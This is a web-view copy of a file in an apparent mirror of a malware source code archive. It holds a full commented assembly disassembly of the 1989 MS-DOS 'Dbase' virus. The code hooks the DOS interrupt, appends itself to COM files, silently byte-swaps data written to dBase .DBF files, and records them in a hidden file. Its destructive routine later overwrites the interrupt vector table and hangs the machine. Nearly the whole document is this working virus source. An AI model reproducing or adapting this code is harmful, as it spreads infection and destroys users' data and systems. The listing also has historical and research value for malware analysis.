Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-24 07:58:36 +00:00
Code Releases Activity
main
vxug-MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.dbase.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

1029 lines
22 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

page 65,132
title The 'Dbase' Virus
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º British Computer Virus Research Centre º
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
; º º
; º The 'Dbase' Virus º
; º Disassembled by Joe Hirst, October 1989 º
; º º
; º Copyright (c) Joe Hirst 1989. º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
MCB SEGMENT AT 0
IDENT DB ?
OWNER DW ?
MEMSIZE DW ?
MCB ENDS
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:NOTHING
; Interrupt 21H routine
BP0000: PUSHF
CMP AX,0FB0AH ; Infection test function?
JNE BP0010 ; Branch if not
XCHG AH,AL ; Swap bytes
POPF
IRET
; Branch to open file function
BP000A: JMP BP06DB
; Branch to new file functions
BP000D: JMP BP0391
BP0010: CMP DI,0FB0AH ; Allow free passage?
JE BP0044 ; Branch if yes
CMP AX,4B00H ; Load and execute function?
JNE BP001E ; Branch if not
JMP BP0490
BP001E: CMP AH,6CH ; Extended open/create function?
JE BP000D ; Branch if yes
CMP AH,5BH ; Create new file function?
JE BP000D ; Branch if yes
CMP AH,3CH ; Create handle function?
JE BP000D ; Branch if yes
CMP AH,3DH ; Open handle function?
JE BP000A ; Branch if yes
CMP AH,3FH ; Read handle function?
JE BP004A ; Branch if yes
CMP AH,40H ; Write handle function?
JE BP004D ; Branch if yes
CMP AH,3EH ; Close handle function?
JNE BP0044 ; Branch if not
JMP BP0340
; Pass on to Int 21H
BP0044: POPF
DB 0EAH ; Far jump
DW0046 DW 0 ; Int 21H offset
DW0048 DW 0 ; Int 21H segment
; Branch to read file function
BP004A: JMP BP00C8
; Branch to write file function
BP004D: JMP BP015F
JMP BP04A7
DB0053 DB 'c:\bugs.dat', 0 ; File pathname
DB 4EH DUP (0), 0FFH ; Read buffer
DW00AE DW 0
DB00B0 DB 14H DUP (0) ; Table of file handles
DW00C4 DW 0, 0
; Read file function
BP00C8: PUSH DI
CALL BP00CC ; \ Get current address
BP00CC: POP DI ; /
SUB DI,1CH ; Address table of file handles
BP00D0: CMP BYTE PTR CS:[DI],0 ; End of table?
JE BP00DE ; Branch if yes
CMP CS:[DI],BL ; Is this the file handle
JE BP00E2 ; Branch if yes
INC DI ; Next entry
JMP BP00D0
BP00DE: POP DI
JMP BP0044 ; Pass on to Int 21H
BP00E2: POP DI
POPF
PUSH CX
PUSH AX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JZ BP012A ; Branch if not
MOV AX,4201H ; Move file pointer (current) function
MOV CX,-1 ; \ Back one byte
MOV DX,CX ; /
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Length to read
POP DX
CALL BP05C3 ; DOS service
POP AX
POP CX
PUSH SI
PUSH BP
MOV SI,DX
MOV BP,[SI]
CALL BP05C3 ; DOS service
PUSHF
PUSH AX
MOV AX,BP
MOV [SI],AL
POP AX
POP BP
POP SI
PUSH CX
PUSH DX
MOV CX,AX
DEC CX
INC DX
CALL BP022D ; Reverse bytes in each word
POP DX
POP CX
JMP BP0138
BP012A: POP DX
POP AX
POP CX
CALL BP05C3 ; DOS service
PUSHF
PUSH CX
MOV CX,AX
CALL BP022D ; Reverse bytes in each word
POP CX
BP0138: PUSH CX
PUSH AX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JZ BP0158 ; Branch if not
POP DX
POP AX
PUSH AX
PUSH DX
ADD DX,AX
DEC DX
MOV CX,1 ; Length to read
MOV AH,3FH ; Read handle function
CALL BP05C3 ; DOS service
BP0158: POP DX
POP AX
POP CX
POPF
RETF 2
; Write file function
BP015F: PUSH DI
CALL BP0163 ; \ Get current address
BP0163: POP DI ; /
SUB DI,OFFSET BP0163-DB00B0 ; Address table of file handles
BP0168: CMP BYTE PTR CS:[DI],0 ; End of table?
JE BP0176 ; Branch if yes
CMP CS:[DI],BL ; Is this the file handle
JE BP017A ; Branch if yes
INC DI ; Next entry
JMP BP0168
BP0176: POP DI
JMP BP0044 ; Pass on to Int 21H
BP017A: CALL BP017D ; \ Get current address
BP017D: POP DI ; /
SUB DI,OFFSET BP017D-DW00C4
MOV WORD PTR CS:[DI],0
MOV WORD PTR CS:[DI+2],0
PUSH AX
PUSH BX
PUSH CX
PUSH DX
MOV AX,4201H ; Move file pointer (current) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
TEST AX,1 ; Is location odd number byte?
JNZ BP01C0 ; Branch if yes
POP DX
POP CX
TEST AX,1 ; Is location odd number byte?
JNZ BP01B2 ; Branch if yes (???)
MOV AX,0
CALL BP0200
JMP BP01E9
BP01B2: MOV AX,1
CALL BP0200
JB BP01E9
CALL BP02B9
JMP BP01E9
BP01C0: POP DX
POP CX
TEST CX,1
JZ BP01D6
CALL BP0262
JB BP01E9
MOV AX,0100H
CALL BP0200
JMP BP01E9
BP01D6: CALL BP0262
JB BP01E9
MOV AX,0101H
CALL BP0200
JB BP01E9
CALL BP02B9
JMP BP01E9
BP01E9: POP BX
POP AX
POP DI
CALL BP01EF ; \ Get current address
BP01EF: POP SI ; /
SUB SI,OFFSET BP01EF-DW00C4
PUSH CS:[SI+2]
POPF
MOV AX,CS:[SI]
POP SI
RETF 2
BP0200: CMP CX,1
JNE BP0209
CALL BP0242
RET
BP0209: CALL BP0215
CALL BP0242
PUSHF
CALL BP0215
POPF
RET
BP0215: PUSH CX
PUSH DX
CALL BP0220
CALL BP022D ; Reverse bytes in each word
POP DX
POP CX
RET
BP0220: CMP AH,1
JNE BP0227
INC DX
DEC CX
BP0227: CMP AL,1
JNE BP022C
DEC CX
BP022C: RET
; Reverse bytes in each word
BP022D: PUSH SI
PUSH CX
PUSH AX
MOV SI,DX
SHR CX,1 ; Divide count by two
BP0234: MOV AX,[SI] ; Get next word
XCHG AH,AL ; Reverse bytes in word
MOV [SI],AX ; Replace word
INC SI ; \ Next word
INC SI ; /
LOOP BP0234 ; Repeat for count
POP AX
POP CX
POP SI
RET
BP0242: PUSH AX
PUSH CX
PUSH DX
PUSH DI
CALL BP0220
MOV AH,40H ; Write handle function
INT 21H ; DOS service
PUSHF
CALL BP0251 ; \ Get current address
BP0251: POP DI ; /
SUB DI,OFFSET BP0251-DW00C4
POP CS:[DI+2]
ADD CS:[DI],AX
POP DI
POP DX
POP CX
POP AX
RET
BP0262: PUSH AX
PUSH CX
PUSH DX
PUSH SI
PUSH BP
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Length to read
MOV SI,DX
MOV BP,[SI]
INT 21H ; DOS service
JB BP02A3 ; Branch if error
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JB BP02A3 ; Branch if error
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JB BP02A3 ; Branch if error
XCHG BP,[SI]
MOV AX,1
BP02A3: PUSHF
CALL BP02A7 ; \ Get current address
BP02A7: POP SI ; /
SUB SI,OFFSET BP02A7-DW00C4
POP CS:[SI+2]
MOV CS:[SI],AX
POP BP
POP SI
POP DX
POP CX
POP AX
RET
BP02B9: PUSH AX
PUSH CX
PUSH DX
PUSH SI
PUSH BP
MOV SI,DX
ADD SI,CX
DEC SI
MOV DX,1 ; \ Forward one byte
XOR CX,CX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AH,3FH ; Read handle function
MOV CX,1 ; Read one byte
MOV BP,[SI]
INT 21H ; DOS service
JB BP02E0 ; Branch if error
CMP AX,1 ; One byte read?
JNE BP02E0 ; Branch if not
JMP BP02F6
BP02E0: MOV CX,-1 ; \ Back one byte
MOV DX,CX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV DX,SI
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
INT 21H ; DOS service
JMP BP032A
BP02F6: MOV DX,-2 ; \ Back two byte
MOV CX,-1 ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
MOV DX,SI
INT 21H ; DOS service
JB BP032A ; Branch if error
XCHG BP,[SI]
MOV CX,1 ; Length to write
MOV AH,40H ; Write handle function
MOV DX,SI
INT 21H ; DOS service
JB BP032A ; Branch if error
XCHG BP,[SI]
MOV DX,-1 ; \ Back one byte
MOV CX,DX ; /
MOV AX,4201H ; Move file pointer (current) function
INT 21H ; DOS service
MOV AX,1
BP032A: PUSHF
CALL BP032E ; \ Get current address
BP032E: POP SI ; /
SUB SI,OFFSET BP032E-DW00C4
POP CS:[SI+2]
ADD CS:[SI],AX
POP BP
POP SI
POP DX
POP CX
POP AX
RET
BP0340: PUSH BP
PUSH CX
CALL BP0345 ; \ Get current address
BP0345: POP BP ; /
SUB BP,OFFSET BP0345-DW00AE
MOV CX,CS:[BP+0]
CMP CX,0
JE BP037C
ADD BP,2
BP0356: CMP CS:[BP+0],BL
JE BP0362
INC BP
LOOP BP0356
JMP BP037C
BP0362: MOV CL,CS:[BP+1]
MOV CS:[BP+0],CL
INC BP
CMP CL,0
JNE BP0362
CALL BP0373 ; \ Get current address
BP0373: POP BP ; /
SUB BP,OFFSET BP0373-DW00AE
DEC WORD PTR CS:[BP+0]
BP037C: POP CX
POP BP
JMP BP0044 ; Pass on to Int 21H
BP0381: JMP BP04A7
JMP BP0044 ; Pass on to Int 21H
DW0387 DW 0 ; File date
DW0389 DW 0 ; File time
DW038B DW 0 ; File attributes
DW038D DW 0 ; Pathname segment
DW038F DW 0 ; Pathname offset
; New file functions
BP0391: PUSH SI
PUSH BP
CMP AH,6CH ; Extended open/create function?
JE BP039A ; Branch if yes
MOV SI,DX ; Copy filepath pointer
BP039A: MOV BP,SI ; Copy filepath pointer
CALL BP0453 ; Convert pathname to uppercase
CALL BP0468 ; Test for Dbase file
JNE BP0381 ; Branch if not
PUSH DX
MOV DX,SI ; Copy pathname (for function 6CH)
CALL BP0665 ; Search BUG.DAT file for pathname
POP DX
JB BP0415 ; Branch if found
PUSH ES
PUSH DS
PUSH DX
PUSH SI
PUSH DI
PUSH CX
PUSH BX
PUSH AX
CALL BP03B8 ; \ Get current address
BP03B8: POP DX ; /
SUB DX,OFFSET BP03B8-DB0053 ; Address 'BUGS.DAT' pathname
PUSH BP
MOV BP,DS ; \ Set ES to DS
MOV ES,BP ; /
POP BP
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV AX,3D02H ; Open handle (R/W) function
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
JNB BP03D8 ; Branch if no error
MOV AH,3CH ; Create handle function
MOV CX,2 ; Hidden file
INT 21H ; DOS service
JB BP0448 ; Branch if error
BP03D8: MOV BX,AX ; Move handle
CALL BP06F7 ; Is file out of time?
XOR DX,DX ; \ No offset
XOR CX,CX ; /
MOV AX,4202H ; Move file pointer (EOF) function
INT 21H ; DOS service
MOV DX,BP
MOV DI,DX
MOV BP,ES ; \ Set DS to ES
MOV DS,BP ; /
MOV CX,004EH ; Length to write
MOV AH,40H ; Write handle function
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
CALL BP03FB ; \ Get current address
BP03FB: POP SI ; /
SUB SI,74H ; Address file date
MOV DX,CS:[SI] ; Get file date
MOV AX,5701H ; Set file date & time function
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
JB BP0448 ; Branch if error
POP AX
POP BX
POP CX
POP DI
POP SI
POP DX
POP DS
POP ES
BP0415: POP BP
POP SI
POPF
CALL BP05C3 ; DOS service
JB BP0420 ; Branch if error
CALL BP0423
BP0420: RETF 2
BP0423: PUSHF
PUSH SI
CALL BP0428 ; \ Get current address
BP0428: POP SI ; /
SUB SI,OFFSET BP0428-DW00AE
CMP WORD PTR CS:[SI],14H
JE BP0447
INC WORD PTR CS:[SI]
PUSH BX
MOV BX,SI
ADD BX,CS:[SI]
ADD BX,CS:[SI]
MOV SI,BX
POP BX
MOV CS:[SI],AL
POP SI
POPF
BP0447: RET
BP0448: POP AX
POP BX
POP CX
POP DI
POP SI
POP DX
POP DS
POP ES
JMP BP04A7
; Convert pathname to uppercase
BP0453: PUSH SI
MOV SI,DX ; Copy pathname pointer
BP0456: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP0466 ; Branch if yes
CMP BYTE PTR [SI],'a' ; Lowercase character?
JB BP0463 ; Branch if not
SUB BYTE PTR [SI],' ' ; Convert to uppercase
BP0463: INC SI ; Next character
JMP BP0456 ; Process next character
BP0466: POP SI
RET
; Test for Dbase file
BP0468: CALL BP0453 ; Convert pathname to uppercase
PUSH SI
BP046C: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP0480 ; Branch if yes
CMP BYTE PTR [SI],'.' ; Extension character?
JE BP0479 ; Branch if yes
INC SI ; Next character
JMP BP046C ; Process next character
BP0479: INC SI ; Next character
CMP WORD PTR [SI],'BD' ; Database file (1)?
JNE BP0484 ; Branch if not
BP0480: CMP BYTE PTR [SI+2],'F' ; Database file (2)?
BP0484: POP SI
RET
DB0486 DB 0CDH, 20H, 90H, 90H ; Start of host read buffer
DB048A DB 0, 0 ; Signature read buffer
DB048C DB 0E9H, 0, 0 ; Initial jump instruction
DB 0
; Load and execute function
BP0490: PUSH BP
PUSH SI
MOV SI,DX ; Copy pathname pointer
BP0494: CMP BYTE PTR [SI],0 ; End of pathname?
JE BP04A7 ; Branch if yes
CMP BYTE PTR [SI],'.' ; Extension indicator?
JE BP04AC ; Branch if yes
INC SI ; Next character
JMP BP0494 ; Process next character
BP04A1: POP DS
POP DX
POP DI
POP CX
POP BX
POP AX
BP04A7: POP BP
POP SI
JMP BP0044 ; Pass on to Int 21H
BP04AC: INC SI ; Next character
CMP WORD PTR [SI],'OC' ; Is it a COM file? (1)
JNE BP04A7 ; Branch if not
CMP BYTE PTR [SI+2],'M' ; Is it a COM file? (1)
JNE BP04A7 ; Branch if not
PUSH AX
PUSH BX
PUSH CX
PUSH DI
PUSH DX
PUSH DS
PUSH SI
PUSH CX
MOV AX,4300H ; Get file attributes function
INT 21H ; DOS service
CALL BP04C9 ; \ Get current address
BP04C9: POP SI ; /
SUB SI,OFFSET BP04C9-DW038B ; Address file attributes
MOV CS:[SI],CX ; Save file attributes
MOV CS:[SI+2],DS ; Save pathname segment
MOV CS:[SI+4],DX ; Save pathname offset
AND CX,00FEH ; Switch off read only
MOV AX,4301H ; Set file attributes function
INT 21H ; DOS service
POP CX
POP SI
MOV AX,3D00H ; Open handle (read) function
INT 21H ; DOS service
JB BP04A1 ; Branch if error
MOV BX,AX ; Move handle
MOV AX,5700H ; Get file date & time function
INT 21H ; DOS service
PUSH SI
CALL BP04F6 ; \ Get current address
BP04F6: POP SI ; /
SUB SI,OFFSET BP04F6-DW0387 ; Address file date
MOV CS:[SI],DX ; Save file date
MOV CS:[SI+2],CX ; Save file time
POP SI
MOV AH,3FH ; Read handle function
MOV CX,4 ; Length to read
CALL BP050B ; \ Get current address
BP050B: POP SI ; /
SUB SI,OFFSET BP050B ; Offset of start of virus
MOV DX,SI ; \ Address start of host read buffer
ADD DX,OFFSET DB0486 ; /
PUSH CS ; \ Set DS to CS
POP DS ; /
INT 21H ; DOS service
JB BP058A ; Branch if error
PUSH DX
PUSH SI
MOV SI,DX ; Address start of host read buffer
MOV DX,[SI+1] ; Get branch offset (if its a branch?)
INC DX ; \ Address to signature (DB0630)
XOR CX,CX ; /
MOV AX,4200H ; Move file pointer (start) function
INT 21H ; DOS service
POP SI
POP DX
JB BP058A ; Branch if error
MOV AH,3FH ; Read handle function
MOV CX,2 ; Length to read
ADD DX,4 ; Address to signature read buffer
INT 21H ; DOS service
PUSH SI
MOV SI,DX ; \ Copy signature read buffer address
MOV DI,SI ; /
CMP WORD PTR [SI],0E5E5H ; Test signature
POP SI
JE BP058A ; Branch if infected
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
POP DS
POP DX
PUSH DX
PUSH DS
MOV AX,3D02H ; Open handle (R/W) function
INT 21H ; DOS service
JNB BP0557 ; Branch if no error
JMP BP04A1
BP0557: PUSH CS ; \ Set DS to CS
POP DS ; /
MOV BX,AX ; Move handle
MOV AX,4202H ; Move file pointer (EOF) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
ADD AX,OFFSET START-3 ; Add entry point offset
NOP
MOV [DI+3],AX ; Store in initial jump instruction
XOR DX,DX ; Address start of virus
MOV AH,40H ; Write handle function
MOV CX,OFFSET ENDADR ; Length of virus
NOP
INT 21H ; DOS service
MOV AX,4200H ; Move file pointer (start) function
XOR CX,CX ; \ No offset
XOR DX,DX ; /
INT 21H ; DOS service
MOV DX,DI ; \ Address initial jump instruction
ADD DX,2 ; /
MOV CX,3 ; Length of jump instruction
MOV AH,40H ; Write handle function
INT 21H ; DOS service
BP058A: PUSH SI
CALL BP058E ; \ Get current address
BP058E: POP SI ; /
SUB SI,OFFSET BP058E-DW0387 ; Address file date
MOV DX,CS:[SI] ; Get file date
MOV CX,CS:[SI+2] ; Get file time
POP SI
MOV AX,5701H ; Set file date & time function
INT 21H ; DOS service
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
PUSH SI
PUSH CX
CALL BP05A9 ; \ Get current address
BP05A9: POP SI ; /
SUB SI,OFFSET BP05A9-DW038B ; Address file attributes
MOV CX,CS:[SI] ; Get file attributes
MOV DS,CS:[SI+2] ; Get pathname offset
MOV DX,CS:[SI+4] ; Get pathname segment
MOV AX,4301H ; Set file attributes function
INT 21H ; DOS service
POP CX
POP SI
JMP BP04A1
; Call DOS service
BP05C3: PUSHF
DB 9AH ; Far call
DW05C5 DW 0 ; Int 21H offset
DW05C7 DW 0 ; Int 21H segment
RET
; Infect system
BP05CA: PUSH SI
CALL BP05CE ; \ Get current address
BP05CE: POP SI ; /
SUB SI,OFFSET BP05CE ; Relocate from start of virus
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH DS
PUSH ES
MOV AX,3521H ; Get Int 21H function
INT 21H ; DOS service
MOV CS:[SI+46H],BX ; \ Install vector in jump
MOV CS:[SI+48H],ES ; /
MOV CS:DW05C5[SI],BX ; \ Install vector in call
MOV CS:DW05C7[SI],ES ; /
PUSH CS ; \ Get current segment
POP AX ; /
DEC AX ; \ Address MCB
MOV DS,AX ; /
ASSUME DS:MCB
MOV DX,MEMSIZE ; Get memory block length
SUB DX,0074H ; \ Subtract virus length
nop
DEC DX ; /
MOV MEMSIZE,DX ; Replace new length
ASSUME DS:NOTHING
PUSH CS ; \ Get current segment
POP AX ; /
ADD DX,AX ; \ Address free space
MOV DS,DX ; /
MOV DI,0 ; Start of free space
MOV CX,OFFSET ENDADR ; Length of virus
NOP
CLI
PUSH SI
BP0612: MOV AL,CS:[SI]
MOV [DI],AL
INC SI
INC DI
LOOP BP0612
POP SI
MOV DS,DX
MOV DX,OFFSET BP0000
MOV AX,2521H ; Set Int 21H function
INT 21H ; DOS service
STI
POP ES
POP DS
POP DI
POP DX
POP CX
POP BX
POP AX
JMP BP0640
DB0630 DB 0E5H, 0E5H
; Entry point
START: PUSH AX
MOV AX,0FB0AH ; Infection test function
INT 21H ; DOS service
CMP AX,0AFBH ; Is system infected?
JE BP0640 ; Branch if yes
JMP BP05CA
BP0640: PUSH SI
CALL BP0644 ; \ Get current address
BP0644: POP SI ; /
SUB SI,OFFSET BP0644-DB0486 ; Address start of host read buffer
PUSH BX
MOV BX,0100H ; Address start of host
MOV AX,CS:[SI] ; \ Restore start of host (1)
MOV CS:[BX],AX ; /
MOV AX,CS:[SI+2] ; \
ADD BX,2 ; ) Restore start of host (2)
MOV CS:[BX],AX ; /
POP BX
POP SI
POP AX
MOV AX,0100H ; \ Branch to start of host
JMP AX ; /
; Search BUG.DAT file for pathname
BP0665: PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH BP
PUSH DS
PUSH ES
CALL BP0671 ; \ Get current address
BP0671: POP BP ; /
SUB BP,OFFSET BP0671-DB0053 ; Address 'BUGS.DAT' pathname
PUSH DS ; \ Set ES to DS
POP ES ; /
MOV DI,DX ; Copy pathname pointer
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV DX,BP ; Move pathname address
MOV AX,3D00H ; Open handle (read) function
PUSH DI
MOV DI,0FB0AH ; Allow free passage to DOS
INT 21H ; DOS service
JNB BP0697 ; Branch if no error
MOV AH,3CH ; Create handle function
MOV CX,2 ; Hidden file
INT 21H ; DOS service
JNB BP0697 ; Branch if no error
BP0692: POP DI
CLC
JMP BP06D1
BP0697: MOV BX,AX ; Move handle
ADD DX,0CH ; Read buffer
BP069C: MOV CX,004EH ; Length to read
MOV AH,3FH ; Read handle function
INT 21H ; DOS service
JB BP0692 ; Branch if error
CMP AX,0 ; Did we read anything?
JNE BP06B0 ; Branch if yes
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
JMP BP0692
BP06B0: POP DI
MOV SI,DX
PUSH DI
BP06B4: MOV AL,ES:[DI] ; Get next character
CMP AL,0 ; End of pathname?
JE BP06C3 ; Branch if yes
CMP AL,[SI] ; Does it match file?
JNE BP069C ; Read next section if not
INC SI ; Next file character
INC DI ; Next pathname character
JMP BP06B4 ; Compare next character
; Pathname found on BUG.DAT file
BP06C3: POP DI
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
STC
JMP BP06D1
; unreferenced code
MOV AH,3EH ; Close handle function
INT 21H ; DOS service
CLC
BP06D1: POP ES
POP DS
POP BP
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RET
; Open file function
BP06DB: POPF
CALL BP05C3 ; DOS service
JB BP06F4 ; Branch if error
PUSHF
PUSH SI
MOV SI,DX
CALL BP0468 ; Test for Dbase file
JNE BP06F2 ; Branch if not
CALL BP0665 ; Search BUG.DAT file for pathname
JNB BP06F2 ; Branch if not found
CALL BP0423
BP06F2: POP SI
POPF
BP06F4: RETF 2
; Is file out of time?
BP06F7: PUSH AX
PUSH CX
PUSH DX
PUSH SI
MOV AX,5700H ; Get file date & time function
INT 21H ; DOS service
CALL BP0703 ; \ Get current address
BP0703: POP SI ; /
SUB SI,OFFSET BP0703-DW0387 ; Address file date
MOV CS:[SI],DX ; Save file date
MOV CL,5 ; \ Move month to bottom of reg
SHR DX,CL ; /
AND DX,0FH ; Isolate month
MOV AH,2AH ; Get date function
PUSH DX ; Preserve file month
INT 21H ; DOS service
POP CX ; Recover file month
SUB CL,DH ; Subtract month from file month
CMP CL,0 ; Negative result?
JGE BP0721 ; Branch if not
NEG CL ; Change the sign
BP0721: CMP CL,3 ; Three months difference?
JL BP0729 ; Branch if not
JMP BP072E
BP0729: POP SI
POP DX
POP CX
POP AX
RET
; File three months old (or next year)
BP072E: CLI
MOV AX,3 ; Start count
BP0732: MOV CX,0100H
MOV DX,0 ; \ Address zero
MOV DS,DX ; /
XOR BX,BX
PUSH AX
INT 3 ; Breakpoint
INT 3 ; Breakpoint
POP AX
INC AX ; Increment count
CMP AL,1AH ; Has it reached 26?
JL BP0732 ; Branch if not
BP0745: CLI ; \ Loop with interrupts disabled
JMP BP0745 ; /
ENDADR EQU $
CODE ENDS
END

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
View Git Blame Copy Permalink